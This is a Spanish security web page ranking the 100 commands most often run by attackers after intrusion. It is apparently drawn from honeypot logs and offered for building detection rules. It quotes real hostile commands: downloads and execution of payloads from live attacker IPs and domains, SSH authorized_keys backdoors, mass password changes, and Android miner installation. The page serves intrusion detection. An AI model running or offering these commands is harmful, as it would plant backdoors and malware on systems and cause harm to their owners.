TROYANOSYVIRUS
Actualizado: abril de 2026

Top 100 Comandos Maliciosos

Los comandos mas ejecutados por atacantes tras obtener acceso a sistemas. Util para deteccion de intrusiones y respuesta a incidentes.

6,151 comandos en 24h
1.
$Enter new UNIX password:
100 IPs280x
2.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
161 IPs265x
3.
$lockr -ia .ssh
161 IPs265x
4.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
159 IPs262x
5.
$uname -m
157 IPs262x
6.
$crontab -l
157 IPs261x
7.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
158 IPs261x
8.
$cat /proc/cpuinfo | grep name | wc -l
157 IPs260x
9.
$ls -lh $(which ls)
157 IPs260x
10.
$which ls
157 IPs260x
11.
$w
156 IPs260x
12.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
157 IPs260x
13.
$uname
154 IPs258x
14.
$uname -a
155 IPs258x
15.
$cat /proc/cpuinfo | grep model | grep name | wc -l
155 IPs258x
16.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
154 IPs258x
17.
$top
155 IPs256x
18.
$whoami
153 IPs256x
19.
$lscpu | grep Model
152 IPs255x
20.
$pm list packages 2>/dev/null
1 IPs141x
21.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
85 IPs118x
22.
$cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||curl -so b http://196.251.107.133/bins/parm7 2>/dev/null||toybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null);chmod 777 b 2>/dev/null;(su 0 ./b adb||./b adb) 2>/dev/null;rm -f b;(wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||curl -so b ht
1 IPs68x
23.
$/bin/./uname -s -v -n -r -m
13 IPs51x
24.
$pkill -f xig-miner 2>/dev/null
1 IPs15x
25.
$pkill -f xmr-stak 2>/dev/null
1 IPs15x
26.
$pkill -f xig 2>/dev/null
1 IPs15x
27.
$pkill -f minerd 2>/dev/null
1 IPs15x
28.
$pkill -f minergate 2>/dev/null
1 IPs15x
29.
$if [ -e '/data/app/com.ufo.miner-1' ]; then echo 'exists'; else touch '/data/app/com.ufo.miner-1' && chmod 000 '/data/app/com.ufo.miner-1' && echo 'blocked' || echo 'failed'; fi
1 IPs15x
30.
$pkill -f trinity 2>/dev/null
1 IPs15x
31.
$pkill -f ethminer 2>/dev/null
1 IPs15x
32.
$pkill -f cpuminer 2>/dev/null
1 IPs15x
33.
$if [ -e '/data/app/com.ufo.miner-2' ]; then echo 'exists'; else touch '/data/app/com.ufo.miner-2' && chmod 000 '/data/app/com.ufo.miner-2' && echo 'blocked' || echo 'failed'; fi
1 IPs15x
34.
$if [ -e '/data/data/com.ufo.miner' ]; then echo 'exists'; else touch '/data/data/com.ufo.miner' && chmod 000 '/data/data/com.ufo.miner' && echo 'blocked' || echo 'failed'; fi
1 IPs15x
35.
$if [ -e '/data/local/tmp/ufo.apk' ]; then echo 'exists'; else touch '/data/local/tmp/ufo.apk' && chmod 000 '/data/local/tmp/ufo.apk' && echo 'blocked' || echo 'failed'; fi
1 IPs15x
36.
$pkill -f xmrig 2>/dev/null
1 IPs15x
37.
$uname -s -v -n -r -m
6 IPs11x
38.
$uname -s -m
10 IPs10x
39.
$echo mirai
5 IPs9x
40.
$cd /tmp || cd /run || cd /var/run || cd /dev/shm; wget https://tg-xxooxx888.8964.mom/loader.sh -O .x 2>/dev/null || curl -s https://tg-xxooxx888.8964.mom/loader.sh -o .x; chmod 777 .x; ./.x telnet; rm -f .x
4 IPs8x
41.
$pm install /data/local/tmp/ufo.apk
4 IPs7x
42.
$rm -f /data/local/tmp/ufo.apk
4 IPs7x
43.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
4 IPs7x
44.
$rm -rf /data/local/tmp/*
4 IPs7x
45.
$pm path com.ufo.miner
4 IPs7x
46.
$ps | grep trinity
4 IPs7x
47.
$/data/local/tmp/nohup /data/local/tmp/trinity
4 IPs7x
48.
$chmod 0755 /data/local/tmp/trinity
4 IPs7x
49.
$chmod 0755 /data/local/tmp/nohup
4 IPs7x
50.
$am start -n com.ufo.miner/com.example.test.MainActivity
4 IPs7x
51.
$User-Agent: Go-http-client/1.1
1 IPs6x
52.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
1 IPs6x
53.
$Connection: close
1 IPs6x
54.
$curl2
1 IPs5x
55.
$cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps
1 IPs5x
56.
$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
1 IPs5x
57.
$/ip cloud print
2 IPs4x
58.
$system
2 IPs4x
59.
$cd /data/local/tmp/; busybox wget http://142.248.80.144/w.sh; sh w.sh; curl http://142.248.80.144/c.sh; sh c.sh
1 IPs4x
60.
$shell
2 IPs4x
61.
$uname -s -v -n -m 2 > /dev/null
1 IPs3x
62.
$curl: option -L not recognized curl: try curl --help or curl --manual for more information
1 IPs3x
63.
$curl: option -L not recognized curl: try 'curl --help' or 'curl --manual' for more information
1 IPs3x
64.
$curl -Lso- https://raw.githubusercontent.com/catherine935/rmto238na/refs/heads/main/install.sh | bash
1 IPs3x
65.
$uname -m 2 > /dev/null
1 IPs3x
66.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $
1 IPs3x
67.
$User-Agent: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.119.1.el7.x86_64
1 IPs2x
68.
$Connection: keep-alive
1 IPs2x
69.
$then
1 IPs2x
70.
$sh
2 IPs2x
71.
$q
1 IPs2x
72.
$Accept: */*
1 IPs2x
73.
$pwd
1 IPs2x
74.
$nproc
1 IPs2x
75.
$Accept-Encoding: gzip, deflate
1 IPs2x
76.
$if [ [ ! -d ${HOME}/.ssh ] ]
1 IPs2x
77.
$chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtB
1 IPs2x
78.
$enable
2 IPs2x
79.
$Accept-Encoding: gzip
1 IPs2x
80.
$echo "123456\nUpsrJvPEvcmZ\nUpsrJvPEvcmZ\n"|passwd
1 IPs1x
81.
$echo "123456\nOcmqA9Vh8cHP\nOcmqA9Vh8cHP\n"|passwd
1 IPs1x
82.
$echo "123456\nC1aybUhw19hi\nC1aybUhw19hi\n"|passwd
1 IPs1x
83.
$echo "123456\nBYPnA4XnfaWr\nBYPnA4XnfaWr\n"|passwd
1 IPs1x
84.
$cd /tmp || cd /run || cd /var/run || cd /dev/shm; wget http://127.0.0.1/install.sh -O .x 2>/dev/null || curl -s http://127.0.0.1/install.sh -o .x; chmod 777 .x; ./.x telnet; rm -f .x
1 IPs1x
85.
$echo "123456\n5CzcoHhAxzv9\n5CzcoHhAxzv9\n"|passwd
1 IPs1x
86.
$echo "123456\n4R61JHPfWsfw\n4R61JHPfWsfw\n"|passwd
1 IPs1x
87.
$echo "123456\n34060ElMba3A\n34060ElMba3A\n"|passwd
1 IPs1x
88.
$echo "123456\n25hCQLqiY1LV\n25hCQLqiY1LV\n"|passwd
1 IPs1x
89.
$cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox SNMSD
1 IPs1x
90.
$echo "123456\n0vaD3XSAJyUz\n0vaD3XSAJyUz\n"|passwd
1 IPs1x
91.
$echo "123321\ncsYEs00u8EyI\ncsYEs00u8EyI\n"|passwd
1 IPs1x
92.
$echo "123321\n2aZi3CMBrrzf\n2aZi3CMBrrzf\n"|passwd
1 IPs1x
93.
$echo "123123123\npIf6wgB303UU\npIf6wgB303UU\n"|passwd
1 IPs1x
94.
$echo "123123123\ndNmJXlAVD1Wy\ndNmJXlAVD1Wy\n"|passwd
1 IPs1x
95.
$echo "ali#\njbhogoZ2jzkE\njbhogoZ2jzkE\n"|passwd
1 IPs1x
96.
$echo "123123123\nIRxZDKn29Ye9\nIRxZDKn29Ye9\n"|passwd
1 IPs1x
97.
$echo "ali#\nQYvSMd3iyvqm\nQYvSMd3iyvqm\n"|passwd
1 IPs1x
98.
$echo "admin\n8BNle5P7NpQG\n8BNle5P7NpQG\n"|passwd
1 IPs1x
99.
$echo "123123123\nCy9L9iiO5NPk\nCy9L9iiO5NPk\n"|passwd
1 IPs1x
100.
$echo "abc123\nCkY7LKbfySOk\nCkY7LKbfySOk\n"|passwd
1 IPs1x

Reconocimiento

uname, whoami, cat /etc/passwd

Descarga

wget, curl, tftp

Persistencia

crontab, chmod, chattr

Mov. Lateral

ssh, scp, ping

Uso para Deteccion

Estos comandos pueden usarse para crear reglas de deteccion en SIEM, IDS/IPS, y sistemas de monitorizacion. Monitoriza estos patrones en tus logs para detectar intrusiones.